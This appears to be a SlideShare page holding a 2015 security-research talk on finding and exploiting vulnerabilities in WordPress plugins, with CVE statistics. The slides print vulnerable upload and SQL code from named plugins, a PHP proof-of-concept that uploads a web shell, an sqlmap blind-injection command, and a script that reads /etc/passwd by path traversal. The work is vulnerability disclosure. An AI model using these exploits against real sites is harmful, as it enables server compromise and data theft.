SlideShare une entreprise Scribd logo

Hacking Wordpress Plugins

Télécharger en tant que PPTX, PDF
Larry Cashdollar
Larry Cashdollar

Hacking WordPress plugins 101

Logiciels
1  sur  31
Hacking WordPress Plugins Larry W. Cashdollar 8/1/2015 v1.2
What is WordPress • Content Management System (CMS) • 23% of all websites (3/23/15) • Plugins - add functionality • Plugins may be authored by anyone
Why hack WordPress plugins? • #1 CMS by number and percentage • Poor security model • Lack of QA on 3rd party plugins • More fun than Ruby Gems
Methodology • Large code footprint with plugins and themes • Prefer no authentication required to exploit* • Look for PHP code that might be exploitable • Search specific traits or patterns: – upload.php – download.php – proxy.php
Requirements • Processes user input • Has reachable code, not just defining a class • Doesn’t check if accessed directly • Doesn’t require authentication • Doesn’t require WP API hooks*
Vulnerabilities • LFI • RFI • RCE • Open Proxies • SQL Injection • XSS
Plugin Code Criteria • Doesn’t have POST/GET/FILE/REQUEST PUNT • If (!defined(ABSPATH)) die; PUNT • If (!is_admin) die; PUNT • Function class() {}; PUNT • May have Injectable SELECT, INSERT, DELETE, UPDATE, etc.
A Quick Look • Download a few random plugins • Examine files named upload.php or download.php • Found RFI in videowhisper-video-presentation • The code:
1 <?php 2 3 if ($_GET["room"]) $room=$_GET["room"]; 4 if ($_POST["room"]) $room=$_POST["room"]; 5 $filename=$_FILES['vw_file']['name']; 6 7 include_once("incsan.php"); 8 sanV($room); 9 if (!$room) exit; 10 sanV($filename); 11 if (!$filename) exit; 12 13 if (strstr($filename,'.php')) exit; 14 15 //do not allow uploads to other folders 16 if ( strstr($room,"/") || strstr($room,"..") ) exit; 17 if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 18 19 $destination="uploads/".$room."/"; 20 if ($_GET["slides"]) $destination .= "slides/"; 21 22 $ext=strtolower(substr($filename,-4)); 23 $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi ",".mpg",".ppt",".pps "); 24 25 if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 26 ?>loadstatus=1
Exploiting it • Upload .phtml .shtml • Execute as www-data user • Previously patched (I circumvented)* • Also present in videowhisper-video- conference-integration * Annoying but still fun
Initial Progress • Downloaded 10 random plugins • Found RFI in two of them! • Plugins had ~ 5k downloads • Must be more vulnerabilities out there
Automate? • Download lots of plugins • grep code for specific patterns? • Same idea as Ruby Gem research I did • Easy to test with PoC • More fun! • Maybe write code to flag high risk code?
Code Ferret v1.0 Feature Doc • Supply list of .php files to examine • Check for user input • Ignore if author checks for ABSPATH etc.. • Look for SQL functions • Flag if use of WP API • Flag if include files
Code Ferret v1.0 Design Doc • Look for specific functions and strings • Anything of interest added to link list • Link list stores line number and reason for flag • Dump output & statistics • ANSI COLOR!
Semi Automatic • git pull https://plugins.svn.wordpress.org • Scraped Plugins off wordpress.org • Downloaded 36,000 plugins • About 20 GB of data • upload.php or download.php • Use Ferret v1.0 to quickly examine lots of files • Profit! Err get some CVEs
Ferret output
Ferret First Run • wp-powerplaygallery v3.3 • Flagged for user input with no access controls • Accesses WordPress API calls • Loads WordPress functions via require_once() • Code examination turns up RFI and Blind SQLi!
wp-powerplaygallery RFI Code 143: if (!empty($_FILES)) { 144: if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) { 145: die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}'); 146: } 147: 148: // Read binary input stream and append it to temp file 149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { 150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 151: } . 158: while ($buff = fread($in, 4096)) { 159: fwrite($out, $buff); 160: }
wp-powerplaygallery SQLI code 131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."',' ".$_REQUEST['name']."',1,'','NULL')"; 133 : $wpdb->query($query);
RFI Exploit Requirements • POST request • Variable albumid must point at existing album in database • File to upload must exist locally • Use c99 shell as our payload • file variable contains payload with local full path • name variable contains our filename
PoC Exploit • <?php • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */ • /*Larry W. Cashdollar @_larry0 • 6/27/2015 • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start • but you can enumerate these by using curl, and looking for redirect 301 responses: • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big • ->301 exists else 404 doesn't. • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php • */ • • • $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo "POST to $target_url $file_name_with_full_path"; • $post = array('albumid'=>’1' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "<hr>"; • echo $result; • echo "<hr>"; • ?>
Blind SQLi Exploit • Sqlmap $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 – risk 3
Lazy Exploits • Started using php-cgi to test exploits • The script Poc.sh #!/bin/sh export GATEWAY_INTERFACE=CGI/1.1 export PATH_TRANSLATED=UserSettings.php export QUERY_STRING=network=../../../../../../../../etc/passwd export REDIRECT_STATUS=CGI export REQUEST_METHOD=GET php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php $ ./Poc.sh
Pitfalls of Exploitation • Exploitable code is a class and isn’t reachable* • Code uses WordPress functions or functions from other segments of code with no includes • Code is incomplete or just broken • Someone discovered it last year
Fatal Errors • [Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27 • [Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90 • [Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
Vulnerable and Broken • <?php • $uploaddir = 'uploads/'; This needs to be full path • $file = $uploaddir . basename($_FILES['uploadfile']['name']); • if (move_uploaded_file($_FILES['uploadfile']['tmp_name' ], $file)) { • echo "success"; • } else { • echo "error"; • } • ?>
oddities • Return local IP address of server • Prints the FULL path of the webserver server • Plugin that downloads itself ?!
Statistics • 20 CVEs • 26* Vulnerabilities found • 6 were previously discovered and not included* • All in all 32 Vulnerabilities discovered • Dozens of known exploitable vulnerabilities remain unpatched * I now google ‘<pluginname> vulnerability’ before bothering to document
Improvements • Parse php scripts checking for reachable code • Use RIPS v1.0 (thanks Chad!) • Circle back and examine vulnerabilities that require login to WP for exploitation
Questions? • larry@akamai.com • Twitter @_larry0
Who Am I • 15 years at Akamai Technologies • ​Hobbyist Vulnerability Researcher • ​75+ CVEs • ​Formerly Unix Systems Administrator 17 years • ​Penetration Tester Back in Late 90s • Enjoy Writing and Breaking Code

Recommandé

CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basicsn|u - The Open Security Community
 
Mongoose and MongoDB 101
Mongoose and MongoDB 101Mongoose and MongoDB 101
Mongoose and MongoDB 101Will Button
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource SharingLuke Weerasooriya
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security FundamentalsJosé Haro Peralta
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Java Generics
Java GenericsJava Generics
Java GenericsZülfikar Karakaya
 

Recommandé

CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basicsn|u - The Open Security Community
 
Mongoose and MongoDB 101
Mongoose and MongoDB 101Mongoose and MongoDB 101
Mongoose and MongoDB 101Will Button
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesMarco Morana
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource SharingLuke Weerasooriya
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security FundamentalsJosé Haro Peralta
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Java Generics
Java GenericsJava Generics
Java GenericsZülfikar Karakaya
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
13 mongoose
13 mongoose13 mongoose
13 mongooseAhmed Elbassel
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationOnwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...Edureka!
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Adam Nurudini
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedValency Networks
 
Spring Data Jpa
Spring Data JpaSpring Data Jpa
Spring Data JpaIvan Queiroz
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
Asynchronous JavaScript Programming
Asynchronous JavaScript ProgrammingAsynchronous JavaScript Programming
Asynchronous JavaScript ProgrammingHaim Michael
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
Spring Security 5.5 From Taxi to Takeoff
Spring Security 5.5 From Taxi to TakeoffSpring Security 5.5 From Taxi to Takeoff
Spring Security 5.5 From Taxi to TakeoffVMware Tanzu
 
jQuery
jQueryjQuery
jQueryDileep Mishra
 
Json web token
Json web tokenJson web token
Json web tokenMayank Patel
 
CV Vikrant Singh
CV Vikrant SinghCV Vikrant Singh
CV Vikrant SinghVikrant Singh
 
bab 3 Aplikasi Turunan
bab 3 Aplikasi Turunanbab 3 Aplikasi Turunan
bab 3 Aplikasi TurunanRiaastutiab
 

Contenu connexe

Tendances

Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...Edureka!
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Adam Nurudini
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedValency Networks
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
Asynchronous JavaScript Programming
Asynchronous JavaScript ProgrammingAsynchronous JavaScript Programming
Asynchronous JavaScript ProgrammingHaim Michael
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
Spring Security 5.5 From Taxi to Takeoff
Spring Security 5.5 From Taxi to TakeoffSpring Security 5.5 From Taxi to Takeoff
Spring Security 5.5 From Taxi to TakeoffVMware Tanzu
 

Tendances (20)

Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
13 mongoose
13 mongoose13 mongoose
13 mongoose
 
Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
 
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...
Node.js Tutorial for Beginners | Node.js Web Application Tutorial | Node.js T...
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
 
Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting Explained
 
Spring Data Jpa
Spring Data JpaSpring Data Jpa
Spring Data Jpa
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
Asynchronous JavaScript Programming
Asynchronous JavaScript ProgrammingAsynchronous JavaScript Programming
Asynchronous JavaScript Programming
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
 
Spring Security 5.5 From Taxi to Takeoff
Spring Security 5.5 From Taxi to TakeoffSpring Security 5.5 From Taxi to Takeoff
Spring Security 5.5 From Taxi to Takeoff
 
jQuery
jQueryjQuery
jQuery
 
Json web token
Json web tokenJson web token
Json web token
 

En vedette

bab 3 Aplikasi Turunan
bab 3 Aplikasi Turunanbab 3 Aplikasi Turunan
bab 3 Aplikasi TurunanRiaastutiab
 
Dakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di MekkahDakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di MekkahFauzan Arief
 
MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007nurmayabadriatulj
 
Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report Grant Hall
 
Creative Brief Reebok classic
Creative Brief Reebok classicCreative Brief Reebok classic
Creative Brief Reebok classicMaeva Condeço
 
Colgate company
Colgate companyColgate company
Colgate companygrvdgr8
 
Localization in V2X Communication Networks
Localization in V2X Communication NetworksLocalization in V2X Communication Networks
Localization in V2X Communication NetworksStefano Severi
 
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.Atlantic Training, LLC.
 
Electrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State AssociationElectrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State AssociationAtlantic Training, LLC.
 
Hand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety ConsultingHand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety ConsultingAtlantic Training, LLC.
 

En vedette (14)

CV Vikrant Singh
CV Vikrant SinghCV Vikrant Singh
CV Vikrant Singh
 
bab 3 Aplikasi Turunan
bab 3 Aplikasi Turunanbab 3 Aplikasi Turunan
bab 3 Aplikasi Turunan
 
Dakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di MekkahDakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di Mekkah
 
MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007
 
Media (3)
Media (3)Media (3)
Media (3)
 
Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report
 
Info za yagodoberachki v ispania 2016 м.02
Info za yagodoberachki v ispania 2016 м.02Info za yagodoberachki v ispania 2016 м.02
Info za yagodoberachki v ispania 2016 м.02
 
Creative Brief Reebok classic
Creative Brief Reebok classicCreative Brief Reebok classic
Creative Brief Reebok classic
 
Colgate company
Colgate companyColgate company
Colgate company
 
Localization in V2X Communication Networks
Localization in V2X Communication NetworksLocalization in V2X Communication Networks
Localization in V2X Communication Networks
 
kalkulus dasar
kalkulus dasarkalkulus dasar
kalkulus dasar
 
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
 
Electrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State AssociationElectrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State Association
 
Hand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety ConsultingHand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety Consulting
 

Similaire à Hacking Wordpress Plugins

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
GitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by ScalaGitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by Scalatakezoe
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depthSanjay Willie
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best PracticesRobert Vidal
 
The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018Brecht Ryckaert
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 
WordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best PracticesWordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best Practicesryanduff
 
Embracing HTTP in the era of API’s
Embracing HTTP in the era of API’sEmbracing HTTP in the era of API’s
Embracing HTTP in the era of API’sVisug
 
Best Practices for WordPress
Best Practices for WordPressBest Practices for WordPress
Best Practices for WordPressTaylor Lovett
 
doing_it_right() with WordPress
doing_it_right() with WordPressdoing_it_right() with WordPress
doing_it_right() with WordPressryanduff
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentationwebhostingguy
 

Similaire à Hacking Wordpress Plugins (20)

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
GitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by ScalaGitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by Scala
 
Introduction to Flask Micro Framework
Introduction to Flask Micro FrameworkIntroduction to Flask Micro Framework
Introduction to Flask Micro Framework
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depth
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
 
The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 
WordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best PracticesWordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best Practices
 
Securing your web apps now
Securing your web apps nowSecuring your web apps now
Securing your web apps now
 
Embracing HTTP in the era of API’s
Embracing HTTP in the era of API’sEmbracing HTTP in the era of API’s
Embracing HTTP in the era of API’s
 
Best Practices for WordPress
Best Practices for WordPressBest Practices for WordPress
